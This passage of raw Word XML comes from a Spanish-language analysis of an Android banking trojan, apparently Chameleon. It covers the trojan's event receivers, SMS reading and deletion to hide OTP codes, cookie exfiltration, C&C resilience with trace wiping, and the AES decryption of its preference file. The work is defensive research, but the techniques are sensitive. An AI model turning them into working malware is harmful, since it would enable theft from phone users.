        <w:t xml:space="preserve"> [X]. La clase extensora no aplica mecanismos </w:t>
      </w:r>
      <w:r w:rsidR="004D4FBB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>adicionales particulares</w:t>
      </w:r>
      <w:r w:rsidR="00892AF7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, sino que simplemente establece la política de cookies como </w:t>
      </w:r>
      <w:r w:rsidR="00892AF7" w:rsidRPr="00792B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ACCEPT_ALL</w:t>
      </w:r>
      <w:r w:rsidR="00892AF7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, con lo que todas las cookies </w:t>
      </w:r>
      <w:r w:rsidR="00191AF3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>propuestas a la hora de la navegación por parte de los sitios webs</w:t>
      </w:r>
      <w:r w:rsidR="00892AF7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> serán aceptadas por el sistema. </w:t>
      </w:r>
      <w:r w:rsidR="006F424C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las cook</w:t>
      </w:r>
      <w:r w:rsidR="004E3315">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidR="006F424C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s almacenadas también pueden ser exfiltradas del dispositivo en dirección a los servidores remotos, además de almacenarlas en la base de datos local</w:t>
      </w:r>
      <w:r w:rsidR="008C59A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F00EE8" w14:textId="77777777" w:rsidR="00567E92" w:rsidRDefault="00567E92" w:rsidP="00567E92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B818F8" w14:textId="79DCC560" w:rsidR="00620462" w:rsidRDefault="00AA78BD" w:rsidP="00620462">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una de las funciones del troyano es la recepción de diferentes tipos de eventos y transmisiones que se producen en el dispositivo infectado. En función del tipo de acción ocurrida y sus características específicas, el malware puede tomar distintos caminos. Para tener constancia de todos estos eventos, la aplicación registra </w:t>
      </w:r>
      <w:r w:rsidR="00650450">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la siguiente lista de clases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501B22E1" w14:textId="2C0AB115"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ScreenBroadcastReceiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761AEB2" w14:textId="57E9BAEE"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PackageChangesBroadcastReceiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F1760" w14:textId="2D051012" w:rsidR="000F68CC" w:rsidRPr="005D7844" w:rsidRDefault="000F68CC"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CloseSysDialogBroadcastReceiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E666326" w14:textId="45A57DF7" w:rsidR="0031204F" w:rsidRPr="005D7844" w:rsidRDefault="0031204F"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RiseUpBroadcastReceiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6286987B" w14:textId="69723011" w:rsidR="00D06117" w:rsidRPr="005D7844" w:rsidRDefault="00D06117" w:rsidP="000F68CC">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WakeLockBroadcastReceiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5416C521" w14:textId="0F330756" w:rsidR="00AA78BD" w:rsidRPr="005D7844" w:rsidRDefault="00AA78BD" w:rsidP="00AA78BD">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PreferenceFileListener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CBACFD" w14:textId="45A40F89" w:rsidR="000F68CC" w:rsidRPr="005D7844" w:rsidRDefault="00AA78BD"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NotificationListenerServiceImpl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6FDE7" w14:textId="4200B44E" w:rsidR="009468E0" w:rsidRPr="005D7844" w:rsidRDefault="00AC70B3"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SensorManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94653F" w14:textId="77777777" w:rsidR="0073498D" w:rsidRDefault="00DC1AC7" w:rsidP="00DC1AC7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Estas clases realizan una tarea de monitorización de los distintos tipos de eventos producidos. Por ejemplo, la clase </w:t>
      </w:r>
      <w:r w:rsidRPr="00E555A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SensorManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se encarga de reaccionar a los eventos de cambios en los sensores del dispositivo, obteniendo los datos acerca del evento y guardando los valores en un sistema que podría hacer referencia a coordenadas dado que sus valo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>res llave en JSON son x, y, z. Es posible que se trate de una monitorización de sensores de movimiento como un acelerómetro. Posteriormente, la clase realiza una preparación de los datos para su posterior exfiltración a los servidores remotos.</w:t>
      </w:r>
      <w:r w:rsidR="0073498D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B04D36" w14:textId="22E9BBB7" w:rsidR="000F68CC" w:rsidRPr="000F68CC" w:rsidRDefault="0073498D" w:rsidP="00DC1AC7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El resto de </w:t>
      </w:r>
      <w:r w:rsidR="000E5685">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>las clases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mencionadas realizan tareas similares a la mencionada en </w:t>
      </w:r>
      <w:r w:rsidR="000D1510">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>naturaleza,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero especializándose en un tipo de evento, como la modificación de paquetes en el sistema o los cambios en el archivo de preferencias XML mencionado previamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356380E" w14:textId="51A720B8" w:rsidR="00850464" w:rsidRDefault="00850464" w:rsidP="00850464">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Otra funcionalidad que presenta el malware es la gestión de SMS, incluyendo la lectura de su contenido y también su borrado si el mensaje recibido cumple con unas características específicas. Las siguientes clases son las utilizadas para realizar estas tareas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B28A1AD" w14:textId="19CC0185"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BroadcastReceiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95A149" w14:textId="3636AFB0"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Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E687DA" w14:textId="00FF2ACA" w:rsidR="00850464" w:rsidRPr="005D7844" w:rsidRDefault="00850464" w:rsidP="00850464">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D7844">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00781489">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7844">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Remover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD37F6" w14:textId="03DB417F" w:rsidR="00223328" w:rsidRDefault="00F62C46" w:rsidP="002A20EA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Como parte de la suite de funcionalidades infostealer, esta capacidad de intercepción de mensajes de texto puede tener gran valor desde el punto de vista de los atacantes. </w:t>
      </w:r>
      <w:r w:rsidR="00223328">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La función desofuscada </w:t>
      </w:r>
      <w:r w:rsidR="00223328">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>deleteSMSMatchingAddressAndBody</w:t>
      </w:r>
      <w:r w:rsidR="00781489">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00223328">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00223328">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que forma parte de la clase SMSRemover</w:t>
      </w:r>
      <w:r w:rsidR="00781489">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> podría ser utilizada para evitar la detección de mensajes recibidos por parte del usuario si estos cumplen una serie de características establecidas por los ajustes del malware en la entrada delete_sms. Esta funcionalidad podría ser útil en casos de robo de códigos de autenticación múltiple u OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F5991" w14:textId="57B89EA6" w:rsidR="00A97FA9" w:rsidRDefault="00A97FA9" w:rsidP="00A97FA9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3B2362" w14:textId="2FB389EE" w:rsidR="006C6161" w:rsidRDefault="0071024E" w:rsidP="00A97FA9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una de las herramientas clave del funcionamiento del troyano es su comunicación con los servidores remotos para todo tipo de tareas. </w:t>
      </w:r>
      <w:r w:rsidR="004B159B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Con el objetivo de</w:t>
      </w:r>
      <w:r w:rsidR="006C6161">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C5661D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">realizar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>todas</w:t>
      </w:r>
      <w:r w:rsidR="006C6161">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> las comunicaciones con los servidores C&amp;C remotos</w:t>
      </w:r>
      <w:r w:rsidR="00C5661D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de manera organizada,</w:t>
      </w:r>
      <w:r w:rsidR="006C6161">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el malware hace uso de las siguientes clases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0838B2CB" w14:textId="77777777" w:rsidR="00786B9A" w:rsidRDefault="00786B9A" w:rsidP="00A97FA9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9ABDA0" w14:textId="53CCC95B" w:rsidR="00786B9A" w:rsidRDefault="000C1FC5" w:rsidP="00A97FA9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="5E1FC4EE">
          <v:shape id="Picture 31" o:spid="_x0000_i1026" type="#_x0000_t75" alt="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="width:433pt;height:279pt;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId59" o:title="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C079B7" w14:textId="77777777" w:rsidR="00F838D9" w:rsidRDefault="00F838D9" w:rsidP="0031204F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38BD8830" w14:textId="6AD4A5B0" w:rsidR="0031204F" w:rsidRDefault="00786B9A" w:rsidP="0031204F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Un aspecto destacable de esta funcionalidad es la resiliencia del sistema en el caso de errores en los servidores remotos. </w:t>
      </w:r>
      <w:r w:rsidR="00B345A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Además de realizar comprobaciones periódicas y almacenar la información de la última conexión en la base de datos, el malware reacciona en caso de que los servidores remotos hayan sufrido problemas, y en el caso de recibir un status de denegación a la petición enviada, procede a eliminar toda la información acerca de los servidores de la base de datos local, suprimiendo posibles trazas</w:t>
      </w:r>
      <w:r w:rsidR="00F838D9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que pudiesen ser analizadas a posteriori.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC14FB" w14:textId="77777777" w:rsidR="00F838D9" w:rsidRDefault="00F838D9" w:rsidP="0031204F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FA06D1" w14:textId="49AE9463" w:rsidR="007D5F50" w:rsidRDefault="007D5F50" w:rsidP="0031204F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Uno de los procesos claves que guía el comportamiento del troyano es el sistema de preferencias</w:t>
      </w:r>
      <w:r w:rsidR="00FF2894">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> locales</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Se encuentra almacenado en el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="007D5F50">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>com.busy.lady_preferences.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">dentro del directorio de datos del dispositivo infectado. La estructura de datos utilizada es un mapa XML que cuenta con el nombre de la preferencia como valor llave. No obstante, todos los valores del mapa se encuentran encriptados, con lo que inicialmente no se pudo averiguar qué tipo de ajustes servían para controlar el sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5026A" w14:textId="51D8E618" w:rsidR="0031204F" w:rsidRDefault="007D5F50" w:rsidP="0031204F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Durante la realización del análisis estático, se encontraron las siguientes clases a cargo de la encriptación y desencriptación de valores en el sistema</w:t>
      </w:r>
      <w:r w:rsidR="00524C65">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. En primer lugar, una clase que </w:t>
      </w:r>
      <w:r w:rsidR="00524C65">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>se ha renombrado a “</w:t>
      </w:r>
      <w:r w:rsidR="00524C65" w:rsidRPr="00050598">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>EncryptionService</w:t>
      </w:r>
      <w:r w:rsidR="00524C65">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”, que tiene como función la encriptación y codificación de los valores de preferencias mencionadas anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D715D" w14:textId="246C7ED2" w:rsidR="00310F9F" w:rsidRDefault="000C1FC5" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:pict w14:anchorId="1A4693E3">
          <v:shape id="Picture 38" o:spid="_x0000_i1025" type="#_x0000_t75" alt="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="width:446pt;height:311pt;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId60" o:title="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994151C" w14:textId="5BA6593B" w:rsidR="00524C65" w:rsidRDefault="00524C65" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588F2615" w14:textId="74D41101" w:rsidR="00524C65" w:rsidRDefault="00524C65" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Posteriormente, se encontró la clase para la operación contraria, la desencriptación de valores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02290950" w14:textId="77777777" w:rsidR="000A24A3" w:rsidRDefault="000A24A3" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401BB99E" w14:textId="69F90CD2" w:rsidR="00524C65" w:rsidRDefault="000C1FC5" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="1A7456BC">
          <v:shape id="Picture 39" o:spid="_x0000_s2057" type="#_x0000_t75" alt="A black rectangular object with black text&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:6.15pt;width:232.75pt;height:85.6pt;z-index:22;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1" o:title="A black rectangular object with black text&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E83A1B" w14:textId="505753D8" w:rsidR="00943AD6" w:rsidRDefault="000A24A3" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Tras tratar de aplicar ingeniería inversa al método de encriptación, se descubrió que la clave utilizada es el identificador único del dispositivo infectado mencionado previamente. Una vez conocida la clave y el vector de inicialización (que se encuentra directamente en el código y no sufre alteraciones), se puede proceder a </w:t>
      </w:r>
      <w:r w:rsidR="00761B44">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la creación de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> una clase en Java que desencripte automáticamente los valores de los ajustes, llamada “</w:t>
      </w:r>
      <w:r w:rsidRPr="00050598">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ChameleonPreferenceDecryptor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00407D24">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Hay que tener en cuenta el método utilizado para </w:t>
      </w:r>
      <w:r w:rsidR="00943AD6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la encriptación </w:t>
      </w:r>
      <w:r w:rsidR="00943AD6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>inicial</w:t>
      </w:r>
      <w:r w:rsidR="00407D24">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, que se trata del algoritmo AES en modo “block” y con un modo de relleno o padding conocido como PKCS</w:t>
      </w:r>
      <w:r w:rsidR="00BF2A51">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5Padding</w:t>
      </w:r>
      <w:r w:rsidR="00407D24">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X].</w:t>
      </w:r>
      <w:r w:rsidR="004A1067">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Por último, el algoritmo utilizado realiza varias codificaciones previamente a la encriptación final. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC87A2E" w14:textId="332B5385" w:rsidR="00943AD6" w:rsidRDefault="004A1067" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El diagrama a continuación muestra los pasos del proceso de desencriptación empleado</w:t>
      </w:r>
      <w:r w:rsidR="00BA1498">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el fichero Java</w:t>
      </w:r>
      <w:r w:rsidR="00943AD6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para uno de los valores reales encontrados en el XML de preferencias:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899D2C2" w14:textId="71000949" w:rsidR="004A1067" w:rsidRPr="00BA1498" w:rsidRDefault="000C1FC5" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="11309817">
